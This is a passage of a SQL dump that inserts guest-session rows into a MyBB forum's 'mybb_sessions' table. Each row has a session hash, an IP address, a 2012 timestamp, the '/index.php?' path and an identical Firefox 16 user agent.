`ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7bb24e503f0cdbeba9980903b73b79bd', '0', '85.47.105.27', '1352772433', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a8985e8d4c405e003a4bf5918b43376d', '0', '65.185.236.86', '1352772434', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('69b62eb782239f80b1b0e37aca11c18a', '0', '45.139.215.185', '1352772434', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4f81acd43c082b82d0cc3291c08bf8bb', '0', '98.167.93.39', '1352772435', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('89e835858abede678506043a9f251a00', '0', '221.53.66.8', '1352772436', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5249bad817bfe2107f4297db39052285', '0', '180.154.176.241', '1352772436', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6de2cae6ca3ad941449a1d0f28ef87b2', '0', '160.34.48.133', '1352772437', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6cf6bd56941e21b404650c6a37b631da', '0', '15.19.92.250', '1352772438', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a4990666c2bd9719a3e9947f1ba275ed', '0', '89.67.191.128', '1352772439', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('89bd33d63f59fcd619f3e4e87c95de23', '0', '107.62.221.181', '1352772440', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0b0bfc655bc6cda524f36627e2bd49fb', '0', '56.57.106.229', '1352772441', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b096ccbde9fb35981f59633bd372309e', '0', '189.197.95.241', '1352772441', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ff6f00e3f97b46cf071b5ede053646f8', '0', '135.171.204.118', '1352772442', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('68eddcd2b358dfd631f63f3be508bc1a', '0', '218.14.244.209', '1352772442', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('569c9e4e3d3d3705136d8596df429acc', '0', '181.21.113.21', '1352772443', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3273f815dd35844a6204331e7f9af519', '0', '20.246.95.147', '1352772444', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d6a5a4a2c0bae38c475c9b6aeabf37a6', '0', '180.139.168.221', '1352772445', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cc7d5f2dd5f23244052fb524b7af3396', '0', '168.166.40.113', '1352772446', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('406bd288c5bada50dab1dcfd1dffa4be', '0', '241.5.70.11', '1352772446', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b7041ad335ba313496b55f5ad2fb4cd2', '0', '219.167.83.57', '1352772447', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ce21210e9e918248b1a565797621a889', '0', '135.119.152.104', '1352772448', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a4791096efc8319d535ee2eec05cd312', '0', '248.63.203.112', '1352772449', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b3417cf49b6dafd31e7f474a9aeacaa6', '0', '250.38.56.78', '1352772449', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d05f1de30d9b594f5db4eccecc4fe61e', '0', '42.53.242.104', '1352772450', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6517b5acfd4f8ed9c5f48dbe9c289cc2', '0', '22.191.217.103', '1352772450', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('74eec527ce6a530c1b4400ba176fa692', '0', '211.12.178.75', '1352772451', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('49d4cf43519c2c57b526feefb19fda1c', '0', '20.69.8.137', '1352772452', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('42118bc3a2ca0f71131337ebfd44a128', '0', '164.95.59.197', '1352772453', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('18304b3cf5e1291be87cad0e03938fbf', '0', '86.198.49.175', '1352772454', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e486f4231e9b1ff37c1debca8b03c192', '0', '248.51.204.149', '1352772454', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1c7386ecd87681e7dddaccd984be71c2', '0', '88.119.120.92', '1352772455', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('07a4b9c4188ca052d3712cabf550b325', '0', '201.199.156.104', '1352772456', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('96815bec707c17d23d83f7646b4bd0aa', '0', '51.145.165.108', '1352772457', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a0cab399ccb4104aaf8da24bb566bb7b', '0', '190.189.132.219', '1352772458', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9a4dffa05e3430f3ccf00f320d8fc54c', '0', '39.130.2.246', '1352772458', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f733bcacbfd33b4dbda44a45ac72cc27', '0', '132.159.167.69', '1352772459', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e572396458b86a0127f72c7b93b5bd35', '0', '180.234.215.101', '1352772460', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('dc1322f1e9b4b9d5d26f2aa18d77af60', '0', '56.255.150.172', '1352772460', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('43f2a55742e522b014b22e57daf1322d', '0', '211.125.49.47', '1352772461', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4755e8a7badfa3c0d490706188783d51', '0', '73.152.119.110', '1352772462', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('943dee49f5e999e52f34081798eb6635', '0', '191.92.44.39', '1352772462', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('940dfd46cbe9593e168d5d5da6b75516', '0', '180.114.42.154', '1352772464', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a653fa43797b6466c36212df096b79cd', '0', '152.56.145.29', '1352772465', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('415c2a2eb7c8f7658c6d64c0d6bb486a', '0', '167.166.106.43', '1352772466', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ca41bf161c48dd36536171c3c3c1597c', '0', '40.37.210.74', '1352772466', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b19e91393406ef9658b035e05c503131', '0', '67.3.35.241', '1352772467', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4a046eba8a0bf0cd17b616696e271bd5', '0', '129.173.177.159', '1352772467', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4d5c08963f245301463b328c4b240f3b', '0', '46.134.158.22', '1352772468', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3021a023cd230b85ecbefd2a97cca31a', '0', '7.240.243.184', '1352772469', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('73746137d98d7040c0230b3a2eda3d57', '0', '219.183.65.25', '1352772470', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b630978ffacf66f5a11372d995148498', '0', '245.135.176.106', '1352772471', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cd84204dadb8bc880bbda4f90b2494c0', '0', '176.103.238.68', '1352772471', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('adcff65bd304c84d600c1228d35a4304', '0', '139.211.238.67', '1352772472', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f5bf37347d245fea928943f8394405c6', '0', '84.127.128.33', '1352772473', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6817c00e43b2a98c8e9171e51d786edd', '0', '197.148.2.6', '1352772473', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('37eb1584aadb80dcf0644fa5259ff1f3', '0', '37.77.250.151', '1352772474', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b44b953071cd505c9167a8a2ab7d8e7b', '0', '240.129.223.120', '1352772475', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('319f3626c8133cf16fa959c57312438f', '0', '158.118.11.119', '1352772476', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6c7473863f0db1960d7e066766064b89', '0', '139.67.164.65', '1352772476', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('69c9b2a2e2103506226ea3746165a825', '0', '225.224.167.85', '1352772478', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('011f38a678f6b1283621899f33b2f322', '0', '6.149.182.54', '1352772479', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7a388aba87a961ba2a5ce2d27bee261f', '0', '134.214.132.6', '1352772479', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5ddada98a69d83d7f6aae2d433f6763b', '0', '49.70.208.160', '1352772480', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d7e0f4527409726c58e4d5e2cb9b7fff', '0', '59.42.202.4', '1352772480', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1f613671208f1224654cc62e37f56373', '0', '114.197.89.84', '1352772481', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d51ab1e99aa3535dd99c6fa27140b59a', '0', '123.124.151.109', '1352772482', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('94b4db34bb84cc6d079aa4b2186829bf', '0', '229.99.143.239', '1352772482', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bf253f0c30225edbfa16624267b7b992', '0', '79.24.184.83', '1352772483', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4a32bb853ca5d8e6905ea5639c181a22', '0', '62.236.126.170', '1352772484', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bc9c0306eb8ec40e073ef8b71a9627c7', '0', '130.10.48.108', '1352772485', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('15592fa8fc459dda715e30f8a4293d7e', '0', '140.224.74.248', '1352772486', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('776c1344a2f1c39733f69a54b8223c0b', '0', '209.213.158.197', '1352772486', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fab90635bbfac26f0d5902e6b8a3b3fe', '0', '232.182.224.219', '1352772487', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('21c760dbb2eee73c2f33209802602d92', '0', '179.250.217.214', '1352772488', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('00792093e7f1fbb4b4f43589efb4cfcc', '0', '245.163.217.148', '1352772488', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cb1f555eb9e50cd718e7ee4e9e9ad710', '0', '168.209.239.104', '1352772489', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3e25b5e70f6cb91e46cf18645b80fed0', '0', '77.28.123.84', '1352772490', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d2ec461a1a804645e14fd162e0d28f47', '0', '5.177.5.67', '1352772491', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4600a85514660c85bd09e4a1dd8b6d1a', '0', '127.170.173.142', '1352772491', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES 